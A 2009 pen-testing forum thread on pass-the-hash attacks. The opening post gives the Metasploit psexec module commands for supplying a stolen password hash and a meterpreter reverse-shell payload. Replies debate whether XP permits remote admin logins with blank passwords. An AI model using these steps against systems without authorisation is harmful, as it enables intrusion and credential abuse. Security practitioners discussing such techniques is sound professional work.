Author Topic: Pass-the-hash attack with Metasploit
Orhan (Newbie)
« on: May 20, 2009, 04:05:37 PM »

I recently attended the very excellent SANS 560 course and there was a section on the "pass-the-hash" attack. The course covers both the pass-the-hash toolkit by Core Security and the patch for Samba by JoMo-kun of FooFus, both of which work very well. But there is an easier way!

If you're pen testing, you must be using Metasploit and there is a fantastic (and somewhat overlooked) exploit called:

windows/smb/psexec

This module allows you to run a command on a remote machine. A feature of this module is that it gives you the option to supply either a password or a hash value as the credentials being used. So if you have just exploited a machine and gained a hash dump, simply set your username (the default is Administrator) and put your password hash straight into the SMBPass field:

set SMBPass {insert in the LANMAN & NT hash only}

You can setup your payloads in the normal way:

set PAYLOAD windows/meterpreter/reverse_tcp

Set up your other variables and go exploit!

The art of password cracking without password cracking.....
Ketchup (Hero Member)
« Reply #1 on: May 20, 2009, 10:49:20 PM »

I am always surprised how many workstations are running with the local Administrator account having a blank password. 

timmedin (Sr. Member)
« Reply #2 on: May 20, 2009, 10:52:49 PM »

Windows does not allow remote Admin access if the local admin (or similarly privileged account) has a blank password.

"Beginning with Windows XP Home edition and later non-server editions of Windows, Windows implements the "ForceGuest" feature when the local Administrator account has a blank password. When a remote user authenticates to Windows XP (and later) as Administrator with a blank password (e.g. by mapping to one of the administrative shares), Windows will assign to their session a Guest access token, not an Administrator access token thereby preventing access to the entire C drive"

http://en.wikipedia.org/wiki/Administrative_share

I blogged about this recently too.
http://blog.securitywhole.com/2009/05/16/make-windows-more-secure-and-use-a-blank-password.aspx
« Last Edit: May 20, 2009, 10:54:37 PM by timmedin »

Ketchup (Hero Member)
« Reply #3 on: May 21, 2009, 12:42:17 AM »

I wasn't sure if that applied to psexec, but now that I think about it, psexec probably uploads an exe to one of the admin shares.

I am wondering if the story is different in a Domain environment though. The reason I wonder is because I recently encountered yet another XP box that had a blank Administrator password. I was able to psexec a meterpreter shell on this box, using the local Administrator account with a blank password. I can't imagine anyone in their right mind would change group policy settings to disable this feature purposely. I can't imagine the workstation user changed it either. I don't remember, but I will go back and check the GPO dumps from that job. I am going to do some testing on a couple of domain PCs as well.

timmedin (Sr. Member)
« Reply #4 on: May 22, 2009, 08:58:42 AM »

Quote from: Ketchup on May 21, 2009, 12:42:17 AM
    I wasn't sure if that applied to psexec, but now that I think about it, psexec probably uploads an exe to one of the admin shares.

    I am wondering if the story is different in a Domain environment though. The reason I wonder is because I recently encountered yet another XP box that had a blank Administrator password. I was able to psexec a meterpreter shell on this box, using the local Administrator account with a blank password. I can't imagine anyone in their right mind would change group policy settings to disable this feature purposely. I can't imagine the workstation user changed it either. I don't remember, but I will go back and check the GPO dumps from that job. I am going to do some testing on a couple of domain PCs as well.

I guess I stand corrected then. My understanding was RPC would not allow you to connect since the token would be restricted due to the blank password.

Ketchup (Hero Member)
« Reply #5 on: May 22, 2009, 09:58:43 AM »

I think that you are correct actually, timmedin. I haven't been able to reproduce this on my domain. Still, I think that the workstation I hacked last week had some weird GPO settings on it, although I don't have that data. I know I connected with a blank Administrator password; even Nessus identified it. I know it was XP Pro, SP2. Weird, I wish I still had access to that machine.

timmedin (Sr. Member)
« Reply #6 on: May 22, 2009, 10:20:39 AM »

Quote from: Ketchup on May 22, 2009, 09:58:43 AM
    I think that you are correct actually, timmedin. I haven't been able to reproduce this on my domain. Still, I think that the workstation I hacked last week had some weird GPO settings on it, although I don't have that data. I know I connected with a blank Administrator password; even Nessus identified it. I know it was XP Pro, SP2. Weird, I wish I still had access to that machine.

I just tested it again and I had the same result. Blank password is more secure than no password. :)